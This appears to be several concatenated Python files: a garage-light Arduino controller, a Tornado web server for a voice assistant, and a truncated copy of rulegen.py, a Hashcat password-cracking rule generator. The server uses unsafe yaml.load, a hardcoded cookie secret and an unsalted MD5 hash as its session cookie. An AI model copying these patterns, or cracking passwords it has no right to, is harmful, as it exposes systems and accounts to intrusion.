:param max_bandwidth: Maximum bandwith for the interface
:param delay_func: lambda-function, gets a packet as parameter and returns a delay value in seconds
:param packet_loss_func: gets a packet as parameter and returns if the packet was lost (true) or not (false)
:return interface that was created.
"""
iface = SimulationInterface(addr, max_bandwidth=max_bandwidth, delay_func=delay_func, packet_loss_func=packet_loss_func)
self.interfacetable[addr] = iface
return self.interfacetable.get(addr)
|
Light.py
|
from GarageBackend.Constants import *
from GarageBackend.ConfigManager import *
from nanpy import ArduinoApi, SerialManager
from time import sleep
from threading import Thread
import time
import datetime
import os, sys, traceback
log = logging.getLogger('Garage.Light')
class Light():
def __init__(self,lid,board_pin_id,garage_key, usbConnectHandler):
self.config_handler = ConfigManager()
self.light_id=lid
self.light_gname = garage_key
self.l_name=garage_key+"_" + lid
self.board_pin_id = board_pin_id
self.l_update_time = time.time()
self.usbConnectHandler = usbConnectHandler
self.status="OFF"
self.flashstatus="OFF"
strlog = "%s created (board pin %d)" % (self.l_name,board_pin_id)
log.info(strlog)
self.thread_light_flash = None
self.relayLOWEnableList=(self.config_handler.getConfigParam('GARAGE_COMMON', "GarageRelayLOWEnable")).split(',')
self.stop_thread = False
pass
def commandLight(self,cmd):
high=self.usbConnectHandler.HIGH
low=self.usbConnectHandler.LOW
#Handle those relays that are reversed
if (str(self.board_pin_id) in self.relayLOWEnableList):
high = self.usbConnectHandler.LOW
low = self.usbConnectHandler.HIGH
if (self.usbConnectHandler != None):
self.l_update_time = time.time()
if (cmd == "ON"):
self.usbConnectHandler.digitalWrite(self.board_pin_id, high)
else:
self.usbConnectHandler.digitalWrite(self.board_pin_id, low)
strlog = "%s %s Turn %s" % (self.l_name, self.light_id,cmd)
log.debug(strlog)
pass
def getLightStatus(self):
if self.flashstatus=="ON":
return "FLASH"
else:
return self.status
def turnOffLight(self):
self.status = "OFF"
self.commandLight(self.status)
def turnOnLight(self):
self.status = "ON"
self.commandLight(self.status)
def startFlashLight(self):
strlog = "%s %s Start Flashing" % (self.l_name, self.light_id)
log.debug(strlog)
self.stop_thread = False
self.flashstatus = "ON"
# light_manager=Light()
if (self.thread_light_flash == None):
self.thread_light_flash = Thread(target=self.flashLight,name=self.l_name,daemon=False)
strlog = "%s %s Start Thread Flashing" % (self.l_name, self.light_id)
log.debug(strlog)
else:
strlog = "%s %s Already flashing!" % (self.l_name, self.light_id)
log.debug(strlog)
return
try:
strlog = "%s %s Start Flashing thread start" % (self.l_name, self.light_id)
log.debug(strlog)
self.thread_light_flash.start()
except Exception:
strlog = "%s %s Start Flashing thread Eception. Already started ?" % (self.l_name, self.light_id)
log.debug(strlog)
def stopFlashLight(self):
strlog = "%s %s Stop Flashing" % (self.l_name, self.light_id)
self.flashstatus = "OFF"
log.debug(strlog)
self.stop_thread = True
if (self.thread_light_flash == None):
return
try:
self.stop_thread = True
self.thread_light_flash.join()
self.thread_light_flash = None
strlog = "%s %s Stop Flashing AFTER thread join" % (self.light_gname, self.light_id)
log.debug(strlog)
except Exception:
self.thread_light_flash = None
strlog = "%s %s Stop Flashing Exception" % (self.l_name, self.light_id)
traceback.print_exc()
def monitor(self):
pass
def flashLight(self):
crazyloop=0;
while (self.stop_thread == False
and crazyloop<150): #2 sec loop
strlog = "%s %s flashing Light !" % (self.l_name, self.light_id)
log.debug(strlog)
crazyloop+=1
if self.stop_thread == False: #Skip flash on thread stop
sleep(1.000)
if (self.status == "OFF" and self.stop_thread == False):
self.commandLight("ON")
else:
self.commandLight("OFF")
sleep(1.000)
self.commandLight(self.status)
self.stop_thread = True
# self.thread_light_flash = None
def connectUSB(self,usbConnectHandler):
strlog = "%s %s Re-connect USB (board pin %d) !" % (self.l_name, self.light_id, self.board_pin_id)
log.info(strlog)
self.usbConnectHandler = usbConnectHandler
self.thread_light_flash.stop()
self.thread_light_flash = Thread(target=Light.flashLight,
args=(self,), name=self.l_name,
daemon=True)
# self.initBoardPinModeOutput(self.board_pin_id)
|
server.py
|
import json
from datetime import timedelta
from robot import config, utils, logging, constants, Updater
import base64
import requests
import tornado.web
import tornado.ioloop
from tornado import gen
import tornado.httpserver
import tornado.options
import hashlib
import threading
import asyncio
import subprocess
import os
import time
import yaml
import markdown
import random
import requests
from tornado.websocket import WebSocketHandler
logger = logging.getLogger(__name__)
conversation, wukong = None, None
suggestions = [
'现在几点',
'你吃饭了吗',
'上海的天气',
'写一首关于大海的诗',
'来玩成语接龙',
'我有多少邮件',
'你叫什么名字',
'讲个笑话'
]
class BaseHandler(tornado.web.RequestHandler):
def isValidated(self):
return self.get_cookie("validation") == config.get('/server/validate', '')
def validate(self, validation):
return validation == config.get('/server/validate', '')
class MainHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation, wukong, suggestions
if not self.isValidated():
self.redirect("/login")
return
if conversation:
info = Updater.fetch()
suggestion = random.choice(suggestions)
self.render('index.html', history=conversation.getHistory(), update_info=info, suggestion=suggestion)
else:
self.render('index.html', history=[])
class ChatHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'text':
query = self.get_argument('query')
uuid = self.get_argument('uuid')
conversation.doResponse(query, uuid)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
elif self.get_argument('type') == 'voice':
voice_data = self.get_argument('voice')
tmpfile = utils.write_temp_file(base64.b64decode(voice_data), '.wav')
fname, suffix = os.path.splitext(tmpfile)
nfile = fname + '-16k' + suffix
# downsampling
soxCall = 'sox ' + tmpfile + \
' ' + nfile + ' rate 16k'
p = subprocess.call([soxCall], shell=True, close_fds=True)
utils.check_and_delete(tmpfile)
conversation.doConverse(nfile)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class GetHistoryHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
res = {'code': 0, 'message': 'ok', 'history': json.dumps(conversation.getHistory())}
self.write(json.dumps(res))
self.finish()
class GetConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
key = self.get_argument("key", default="")
res = ''
if key == '':
res = {'code': 0, 'message': 'ok', 'config': config.getText(), 'sensitivity': config.get('sensitivity', 0.5)}
else:
res = {'code': 0, 'message': 'ok', 'value': config.get(key)}
self.write(json.dumps(res))
self.finish()
class GetLogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
lines = self.get_argument('lines', default=200)
res = {'code': 0, 'message': 'ok', 'log': logging.readLog(lines)}
self.write(json.dumps(res))
self.finish()
class LogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render("log.html")
class OperateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'restart':
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
self.finish()
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class ConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render('config.html', sensitivity=config.get('sensitivity'))
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
configStr = self.get_argument('config')
try:
yaml.load(configStr)
config.dump(configStr)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
except:
res = {'code': 1, 'message': 'YAML解析失败,请检查内容'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class DonateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
return
r = requests.get('https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/donate.md')
content = markdown.markdown(r.text, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('donate.html', content=content)
class APIHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ''
with open(os.path.join(constants.TEMPLATE_PATH, "api.md"), 'r') as f:
content = f.read()
content = markdown.markdown(content, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('api.html', content=content)
class UpdateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if wukong.update():
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': '更新失败,请手动更新'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class LoginHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.redirect('/')
else:
self.render('login.html', error=None)
@tornado.web.asynchronous
@gen.coroutine
def post(self):
if self.get_argument('username') == config.get('/server/username') and \
hashlib.md5(self.get_argument('password').encode('utf-8')).hexdigest() \
== config.get('/server/validate'):
self.set_cookie("validation", config.get('/server/validate'))
self.redirect("/")
else:
self.render('login.html', error="登录失败")
class LogoutHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.set_cookie("validation", '')
self.redirect("/login")
settings = {
"cookie_secret" : b'*\xc4bZv0\xd7\xf9\xb2\x8e\xff\xbcL\x1c\xfa\xfeh\xe1\xb8\xdb\xd1y_\x1a',
"template_path": "server/templates",
"static_path": "server/static",
"debug": False
}
application = tornado.web.Application([
(r"/", MainHandler),
(r"/login", LoginHandler),
(r"/gethistory", GetHistoryHandler),
(r"/chat", ChatHandler),
(r"/config", ConfigHandler),
(r"/getconfig", GetConfigHandler),
(r"/operate", OperateHandler),
(r"/getlog", GetLogHandler),
(r"/log", LogHandler),
(r"/logout", LogoutHandler),
(r"/api", APIHandler),
(r"/upgrade", UpdateHandler),
(r"/donate", DonateHandler)
], **settings)
def start_server(con, wk):
global conversation, wukong
conversation = con
wukong = wk
if config.get('/server/enable', False):
host = config.get('/server/host', '0.0.0.0')
port = config.get('/server/port', '5000')
try:
asyncio.set_event_loop(asyncio.new_event_loop())
application.listen(int(port))
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
logger.critical('服务器启动失败: {}'.format(e))
def run(conversation, wukong):
t = threading.Thread(target=lambda: start_server(conversation, wukong))
t.start()
|
rulegen.py
|
#!/usr/bin/env python3
# Rulegen.py - Advanced automated password rule and wordlist generator for the
# Hashcat password cracker using the Levenshtein Reverse Path
# algorithm and Enchant spell checking library.
#
# This tool is part of PACK (Password Analysis and Cracking Kit)
#
# VERSION 0.0.4
#
# Copyright (C) 2013 Peter Kacherginsky
# All rights reserved.
#
# Please see the attached LICENSE file for additional licensing information.
import re
import sys
import time
import enchant
import multiprocessing
import subprocess
from collections import Counter
from optparse import OptionParser, OptionGroup
from tqdm import tqdm
VERSION = "0.0.5"
# Testing rules with hashcat --stdout
HASHCAT_PATH = "hashcat/"
# Newline constant for use in f-strings
NEWLINE = "\r\n"
# Rule Generator class responsible for the complete cycle of rule generation
class RuleGen:
# Initialize Rule Generator class
def __init__(
self,
language,
providers="aspell,myspell",
basename="analysis",
threads=multiprocessing.cpu_count(),
):
self.threads = threads
self.enchant_broker = enchant.Broker()
self.enchant_broker.set_ordering("*", providers)
self.enchant = enchant.Dict(language, self.enchant_broker)
# Output options
self.basename = basename
# Finetuning word generation
self.max_word_dist = 10
self.max_words = 10
self.more_words = False
self.simple_words = False
# Finetuning rule generation
self.max_rule_len = 10
self.max_rules = 10
self.more_rules = False
self.simple_rules = False
self.brute_rules = False
# Debugging options
self.verbose = False
self.debug = False
self.word = None # Custom word to use.
self.quiet = False
#######################################################################
# Word and Rule Statistics
self.numeric_stats_total = 0
self.special_stats_total = 0
self.foreign_stats_total = 0
#######################################################################
# Preanalysis Password Patterns
self.password_pattern = dict()
self.password_pattern["insertion"] = re.compile(
"^[^a-z]*(?P<password>.+?)[^a-z]*$", re.IGNORECASE
)
self.password_pattern["email"] = re.compile(
r"^(?P<password>.+?)@[A-Z0-9.-]+\.[A-Z]{2,4}", re.IGNORECASE
)
self.password_pattern["alldigits"] = re.compile(r"^(\d+)$", re.IGNORECASE)
self.password_pattern["allspecial"] = re.compile(
"^([^a-z0-9]+)$", re.IGNORECASE
)
#######################################################################
# Hashcat Rules Engine
self.hashcat_rule = dict()
######################
# Dummy rule #
######################
# Do nothing
self.hashcat_rule[":"] = lambda x: x
######################
# Case rules #
######################
# Lowercase all letters
self.hashcat_rule["l"] = lambda x: x.lower()
# Capitalize all letters
self.hashcat_rule["u"] = lambda x: x.upper()
# Capitalize the first letter
self.hashcat_rule["c"] = lambda x: x.capitalize()
# Lowercase the first found character, uppercase the rest
self.hashcat_rule["C"] = lambda x: x[0].lower() + x[1:].upper()
# Toggle the case of all characters in word
self.hashcat_rule["t"] = lambda x: x.swapcase()
# Toggle the case of characters at position N
self.hashcat_rule["T"] = lambda x, y: x[:y] + x[y].swapcase() + x[y + 1 :]
# Upper case the first letter and every letter after a space
self.hashcat_rule["E"] = lambda x: " ".join(
[i[0].upper() + i[1:] for i in x.split(" ")]
)
######################
# Rotation rules #
######################
# Reverse the entire word
self.hashcat_rule["r"] = lambda x: x[::-1]
# Rotate the word left
self.hashcat_rule["{"] = lambda x: x[1:] + x[0]
# Rotate the word right
self.hashcat_rule["}"] = lambda x: x[-1] + x[:-1]
######################
# Duplication rules #
######################
# Duplicate entire word
self.hashcat_rule["d"] = lambda x: x + x
# Duplicate entire word N times
self.hashcat_rule["p"] = lambda x, y: x * y
# Duplicate word reversed
self.hashcat_rule["f"] = lambda x: x + x[::-1]
# Duplicate first character N times
self.hashcat_rule["z"] = lambda x, y: x[0] * y + x
# Duplicate last character N times
self.hashcat_rule["Z"] = lambda x, y: x + x[-1] * y
# Duplicate every character
self.hashcat_rule["q"] = lambda x: "".join([i + i for i in x])
# Duplicate first N characters
self.hashcat_rule["y"] = lambda x, y: x[:y] + x
# Duplicate last N characters
self.hashcat_rule["Y"] = lambda x, y: x + x[-y:]
######################
# Cutting rules #
######################
# Delete first character
self.hashcat_rule["["] = lambda x: x[1:]
# Delete last character
self.hashcat_rule["]"] = lambda x: x[:-1]
# Deletes character at position N
self.hashcat_rule["D"] = lambda x, y: x[:y] + x[y + 1 :]
# Truncate word at position N
self.hashcat_rule["'"] = lambda x, y: x[:y]
# Delete M characters, starting at position N
self.hashcat_rule["O"] = lambda x, y, z: x[:y] + x[y + z :]
# Extracts M characters, starting at position N
self.hashcat_rule["'"] = lambda x, y, z: x[y : y + z]
# Purge all instances of X
self.hashcat_rule["@"] = lambda x, y: x.replace(y, "")
######################
# Insertion rules #
######################
# Append character to end
self.hashcat_rule["$"] = lambda x, y: x + y
# Prepend character to front
self.hashcat_rule["^"] = lambda x, y: y + x
# Insert character X at position N
self.hashcat_rule["i"] = lambda x, y, z: x[:y] + z + x[y:]
######################
# Replacement rules #
######################
# Overwrite character at position N with X
self.hashcat_rule["o"] = lambda x, y, z: x[:y] + z + x[y + 1 :]
# Replace all instances of X with Y
self.hashcat_rule["s"] = lambda x, y, z: x.replace(y, z)
# Bitwise shift left character @ N
self.hashcat_rule["L"] = lambda x, y: x[:y] + chr(ord(x[y]) << 1) + x[y + 1 :]
# Bitwise shift right character @ N
self.hashcat_rule["R"] = lambda x, y: x[:y] + chr(ord(x[y]) >> 1) + x[y + 1 :]
# Increment character @ N by 1 ascii value
self.hashcat_rule["+"] = lambda x, y: x[:y] + chr(ord(x[y]) + 1) + x[y + 1 :]
# Decrement character @ N by 1 ascii value
self.hashcat_rule["-"] = lambda x, y: x[:y] + chr(ord(x[y]) - 1) + x[y + 1 :]
# Replace character @ N with value at @ N plus 1
self.hashcat_rule["."] = lambda x, y: x[:y] + x[y + 1] + x[y + 1 :]
# Replace character @ N with value at @ N minus 1
self.hashcat_rule[","] = lambda x, y: x[:y] + x[y - 1] + x[y + 1 :]
######################
# Swapping rules #
######################
# Swap first two characters
self.hashcat_rule["k"] = lambda x: x[1] + x[0] + x[2:]
# Swap last two characters
self.hashcat_rule["K"] = lambda x: x[:-2] + x[-1] + x[-2]
# Swap character X with Y
self.hashcat_rule["*"] = (
lambda x, y, z: x[:y] + x[z] + x[y + 1 : z] + x[y] + x[z + 1 :]
if z > y
else x[:z] + x[y] + x[z + 1 : y] + x[z] + x[y + 1 :]
)
#######################################################################
# Common numeric and special character substitutions (1337 5p34k)
self.leet = dict()
self.leet["1"] = "i"
self.leet["2"] = "z"
self.leet["3"] = "e"
self.leet["4"] = "a"
self.leet["5"] = "s"
self.leet["6"] = "b"
self.leet["7"] = "t"
self.leet["8"] = "b"
self.leet["9"] = "g"
self.leet["0"] = "o"
self.leet["!"] = "i"
self.leet["|"] = "i"
self.leet["@"] = "a"
self.leet["$"] = "s"
self.leet["+"] = "t"
#######################################################################
# Preanalysis rules to bruteforce for each word
self.preanalysis_rules = []
self.preanalysis_rules.append(([], self.hashcat_rule[":"])) # Blank rule
self.preanalysis_rules.append((["r"], self.hashcat_rule["r"])) # Reverse rule
# self.preanalysis_rules.append((['{'],self.hashcat_rule['}'])) # Rotate left
# self.preanalysis_rules.append((['}'],self.hashcat_rule['{'])) #
# Rotate right
##########################################################################
# Calculate Levenshtein edit path matrix
@staticmethod
def levenshtein(word, password):
matrix = []
# Generate and populate the initial matrix
for i in range(len(password) + 1):
matrix.append([])
for j in range(len(word) + 1):
if i == 0:
matrix[i].append(j)
elif j == 0:
matrix[i].append(i)
else:
matrix[i].append(0)
# Calculate edit distance for each substring
for i in range(1, len(password) + 1):
for j in range(1, len(word) + 1):
if password[i - 1] == word[j - 1]:
matrix[i][j] = matrix[i - 1][j - 1]
else:
insertion = matrix[i - 1][j] + 1
deletion = matrix[i][j - 1] + 1
substitution = matrix[i - 1][j - 1] + 1
matrix[i][j] = min(insertion, deletion, substitution)
return matrix
def levenshtein_distance(self, s1, s2):
"""Calculate the Levenshtein distance between two strings.
This is straight from Wikipedia.
"""
if len(s1) < len(s2):
return self.levenshtein_distance(s2, s1)
if not s1:
return len(s2)
previous_row = range(len(s2) + 1)
for i, c1 in enumerate(s1):
current_row = [i + 1]
for j, c2 in enumerate(s2):
insertions = previous_row[j + 1] + 1
deletions = current_row[j] + 1
substitutions = previous_row[j] + (c1 != c2)
current_row.append(min(insertions, deletions, substitutions))
previous_row = current_row
return previous_row[-1]
@staticmethod
def levenshtein_print(matrix, word, password):
""" Print word X password matrix """
print(f" {' '.join(list(word))}")
for i, row in enumerate(matrix):
if i == 0:
print(" ", end=" ")
else:
print(password[i - 1], end=" ")
print(" ".join(f"{col for col in row}"))
def generate_levenshtein_rules(self, word, password):
""" Generates levenshtein rules. Returns a list of lists of levenshtein rules. """
# 1) Generate Levenshtein matrix
matrix = self.levenshtein(word, password)
# 2) Trace reverse paths through the matrix.
paths = self.levenshtein_reverse_recursive(
matrix, len(matrix) - 1, len(matrix[0]) - 1, 0
)
# 3) Return a collection of reverse paths.
return [path for path in paths if len(path) <= matrix[-1][-1]]
def levenshtein_reverse_recursive(self, matrix, i, j, path_len):
"""Calculate reverse Levenshtein paths.
Recursive, Depth First, Short-circuited algorithm by Peter Kacherginsky
Generates a list of edit operations necessary to transform a source word
into a password. Edit operations are recorded in the form:
(operation, password_offset, word_offset)
Where an operation can be either insertion, deletion or replacement.
"""
if i == 0 and j == 0 or path_len > matrix[-1][-1]:
return [[]]
else:
paths = list()
cost = matrix[i][j]
# Calculate minimum cost of each operation
cost_delete = cost_insert = cost_equal_or_replace = sys.maxsize
if i > 0:
cost_insert = matrix[i - 1][j]
if j > 0:
cost_delete = matrix[i][j - 1]
if i > 0 and j > 0:
cost_equal_or_replace = matrix[i - 1][j - 1]
cost_min = min(cost_delete, cost_insert, cost_equal_or_replace)
# Recurse through reverse path for each operation
if cost_insert == cost_min:
insert_paths = self.levenshtein_reverse_recursive(
matrix, i - 1, j, path_len + 1
)
for insert_path in insert_paths:
paths.append(insert_path + [("insert", i - 1, j)])
if cost_delete == cost_min:
delete_paths = self.levenshtein_reverse_recursive(
matrix, i, j - 1, path_len + 1
)
for delete_path in delete_paths:
paths.append(delete_path + [("delete", i, j - 1)])
if cost_equal_or_replace == cost_min:
if cost_equal_or_replace == cost:
equal_paths = self.levenshtein_reverse_recursive(
matrix, i - 1, j - 1, path_len
)
for equal_path in equal_paths:
paths.append(equal_path)
else:
replace_paths = self.levenshtein_reverse_recursive(
matrix, i - 1, j - 1, path_len + 1
)
for replace_path in replace_paths:
paths.append(replace_path + [("replace", i - 1, j - 1)])
return paths
def load_custom_wordlist(self, wordlist_file):
self.enchant = enchant.request_pwl_dict(wordlist_file)
def generate_words(self, password):
""" Generate source word candidates."""
if self.debug:
print(f"[*] Generating source words for {password}")
words = list()
words_collection = list()
# Let's collect best edit distance as soon as possible to prevent
# less efficient pre_rules like reversal and rotation from slowing
# us down with garbage
best_found_distance = 9999
#######################################################################
# Generate words for each preanalysis rule
if not self.brute_rules:
self.preanalysis_rules = self.preanalysis_rules[:1]
for pre_rule, pre_rule_lambda in self.preanalysis_rules:
pre_password = pre_rule_lambda(password)
# Generate word suggestions
if self.word:
suggestions = [self.word]
elif self.simple_words:
suggestions = self.generate_simple_words(pre_password)
else:
suggestions = self.generate_advanced_words(pre_password)
# HACK: Perform some additional expansion on multi-word suggestions
# TODO: May be I should split these two and see if I can generate
# rules for each of the suggestions
for suggestion in suggestions[: self.max_words]:
suggestion = suggestion.replace(" ", "")
suggestion = suggestion.replace("-", "")
if suggestion not in suggestions:
suggestions.append(suggestion)
if len(suggestions) != len(set(suggestions)):
print(sorted(suggestions))
print(sorted(set(suggestions)))
for suggestion in suggestions:
distance = self.levenshtein_distance(suggestion, pre_password)
word = dict()
word["suggestion"] = suggestion
word["distance"] = distance
word["password"] = pre_password
word["pre_rule"] = pre_rule
word["best_rule_length"] = 9999
words.append(word)
#######################################################################
# Perform Optimization
for word in sorted(words, key=lambda w: w["distance"], reverse=False):
# Optimize for best distance
if not self.more_words:
if word["distance"] < best_found_distance:
best_found_distance = word["distance"]
elif word["distance"] > best_found_distance:
if self.verbose:
print(
f"[-] {word['suggestion']} => {{edit distance suboptimal: "
f"{word['distance']} ({best_found_distance})}} => {word['password']}"
)
break
# Filter words with too big edit distance
if word["distance"] <= self.max_word_dist:
if self.debug:
print(
f"[+] {word['suggestion']} => {{edit distance: "
f"{word['distance']} ({best_found_distance})}} = > {word['password']}"
)
words_collection.append(word)
else:
if self.verbose:
print(
f"[-] {word['suggestion']} => {{max distance exceeded: "
"{word['distance']} ({self.max_word_dist})}} => {word['password']}"
)
if self.max_words:
words_collection = words_collection[: self.max_words]
return words_collection
def generate_simple_words(self, password):
""" Generate simple words. A simple spellcheck."""
return self.enchant.suggest(password)
def generate_advanced_words(self, password):
"""Generate advanced words.
Perform some additional non-destructive cleaning to help spell-checkers:
1) Remove non-alpha prefixes and appendixes.
2) Perform common pattern matches (e.g. email).
3) Replace non-alpha character substitutions (1337 5p34k)
"""
# Remove non-alpha prefix and/or appendix
insertion_matches = self.password_pattern["insertion"].match(password)
if insertion_matches:
password = insertion_matches.group("password")
# Pattern matches
email_matches = self.password_pattern["email"].match(password)
if email_matches:
password = email_matches.group("password")
# Replace common special character replacements (1337 5p34k)
preanalysis_password = ""
for c in password:
if c in self.leet:
preanalysis_password += self.leet[c]
else:
preanalysis_password += c
password = preanalysis_password
if self.debug:
f"[*] Preanalysis Password: {password}"
return self.enchant.suggest(password)
##########################################################################
# Hashcat specific offset definition 0-9,A-Z
@staticmethod
def int_to_hashcat(n):
if n < 10:
return n
else:
return chr(65 + n - 10)
@staticmethod
def hashcat_to_int(n):
if n.isdigit():
return int(n)
else:
return ord(n) - 65 + 10
def generate_hashcat_rules(self, suggestion, password):
""" Generate hashcat rules. Returns a length sorted list of lists of hashcat rules."""
# 2) Generate Levenshtein Rules
lev_rules = self.generate_levenshtein_rules(suggestion, password)
# 3) Generate Hashcat Rules
hashcat_rules = []
hashcat_rules_collection = []
#######################################################################
# Generate hashcat rule for each levenshtein rule
for lev_rule in lev_rules:
if self.simple_rules:
hashcat_rule = self.generate_simple_hashcat_rules(
suggestion, lev_rule, password
)
else:
hashcat_rule = self.generate_advanced_hashcat_rules(
suggestion, lev_rule, password
)
if hashcat_rule is None:
print(f"[!] Processing FAILED: {suggestion} => ;( => {password}")
print(" Sorry about that, please report this failure to")
print(" the developer: iphelix [at] thesprawl.org")
else:
hashcat_rules.append(hashcat_rule)
best_found_rule_length = 9999
#######################################################################
# Perform Optimization
for hashcat_rule in sorted(hashcat_rules, key=lambda rule: len(rule)):
rule_length = len(hashcat_rule)
if not self.more_rules:
if rule_length < best_found_rule_length:
best_found_rule_length = rule_length
elif rule_length > best_found_rule_length:
if self.verbose:
print(
f"[-] {suggestion} => {{best rule length exceeded: "
f"{rule_length} ({best_found_rule_length})}} => {password}"
)
break
if rule_length <= self.max_rule_len:
hashcat_rules_collection.append(hashcat_rule)
return hashcat_rules_collection
def generate_simple_hashcat_rules(self, word, rules, password):
""" Generate basic hashcat rules using only basic insert,delete,replace rules. """
hashcat_rules = []
if self.debug:
print(f"[*] Simple Processing {word} => {password}")
# Dynamically apply rules to the source word
# NOTE: Special case were word == password this would work as well.
word_rules = word
for (op, p, _w) in rules:
if self.debug:
print(
f"\t[*] Simple Processing Started: "
f"{word_rules} - {' '.join(hashcat_rules)}"
)
if op == "insert":
hashcat_rules.append(f"i{self.int_to_hashcat(p)}{password[p]}")
word_rules = self.hashcat_rule["i"](word_rules, p, password[p])
elif op == "delete":
hashcat_rules.append(f"D{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["D"](word_rules, p)
elif op == "replace":
hashcat_rules.append(f"o{self.int_to_hashcat(p)}{password[p]}")
word_rules = self.hashcat_rule["o"](word_rules, p, password[p])
if self.debug:
print(
f"\t[*] Simple Processing Ended: "
f"{word_rules} => {' '.join(hashcat_rules)} => {password}"
)
# Check if rules result in the correct password
if word_rules == password:
return hashcat_rules
else:
if self.debug:
print(
f"[!] Simple Processing FAILED: "
f"{word} => {' '.join(hashcat_rules)} => {password} ({word_rules})"
)
return None
def generate_advanced_hashcat_rules(self, word, rules, password):
""" Generate advanced hashcat rules using full range of available rules. """
hashcat_rules = []
if self.debug:
print(f"[*] Advanced Processing {word} => {password}")
# Dynamically apply and store rules in word_rules variable.
# NOTE: Special case where word == password this would work as well.
word_rules = word
# Generate case statistics
password_lower = len([c for c in password if c.islower()])
password_upper = len([c for c in password if c.isupper()])
for i, (op, p, w) in enumerate(rules):
if self.debug:
print(
f"\t[*] Advanced Processing Started: "
f"{word_rules} - {' '.join(hashcat_rules)}"
)
if op == "insert":
hashcat_rules.append(f"i{self.int_to_hashcat(p)}{password[p]}")
word_rules = self.hashcat_rule["i"](word_rules, p, password[p])
elif op == "delete":
hashcat_rules.append(f"D{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["D"](word_rules, p)
elif op == "replace":
# Detecting global replacement such as sXY, l, u, C, c is a non
# trivial problem because different characters may be added or
# removed from the word by other rules. A reliable way to solve
# this problem is to apply all of the rules the source word
# and keep track of its state at any given time. At the same
# time, global replacement rules can be tested by completing
# the rest of the rules using a simplified engine.
# The sequence of if statements determines the priority of
# rules
# This rule was made obsolete by a prior global replacement
if word_rules[p] == password[p]:
if self.debug:
print(
f"\t[*] Advanced Processing Obsolete Rule: "
f"{word_rules} - {' '.join(hashcat_rules)}"
)
# Swapping rules
elif (
p < len(password) - 1
and p < len(word_rules) - 1
and word_rules[p] == password[p + 1]
and word_rules[p + 1] == password[p]
):
# Swap first two characters
if p == 0 and self.generate_simple_hashcat_rules(
self.hashcat_rule["k"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("k")
word_rules = self.hashcat_rule["k"](word_rules)
# Swap last two characters
elif p == len(
word_rules
) - 2 and self.generate_simple_hashcat_rules(
self.hashcat_rule["K"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("K")
word_rules = self.hashcat_rule["K"](word_rules)
# Swap any two characters (only adjacent swapping is
# supported)
elif self.generate_simple_hashcat_rules(
self.hashcat_rule["*"](word_rules, p, p + 1),
rules[i + 1 :],
password,
):
hashcat_rules.append(
f"*{self.int_to_hashcat(p)}{self.int_to_hashcat(p + 1)}"
)
word_rules = self.hashcat_rule["*"](word_rules, p, p + 1)
else:
hashcat_rules.append(f"o{self.int_to_hashcat(p)}{password[p]}")
word_rules = self.hashcat_rule["o"](word_rules, p, password[p])
# Case Toggle: Uppercased a letter
elif word_rules[p].islower() and word_rules[p].upper() == password[p]:
# Toggle the case of all characters in word (mixed cases)
if (
password_upper
and password_lower
and self.generate_simple_hashcat_rules(
self.hashcat_rule["t"](word_rules), rules[i + 1 :], password
)
):
hashcat_rules.append("t")
word_rules = self.hashcat_rule["t"](word_rules)
# Capitalize all letters
elif self.generate_simple_hashcat_rules(
self.hashcat_rule["u"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("u")
word_rules = self.hashcat_rule["u"](word_rules)
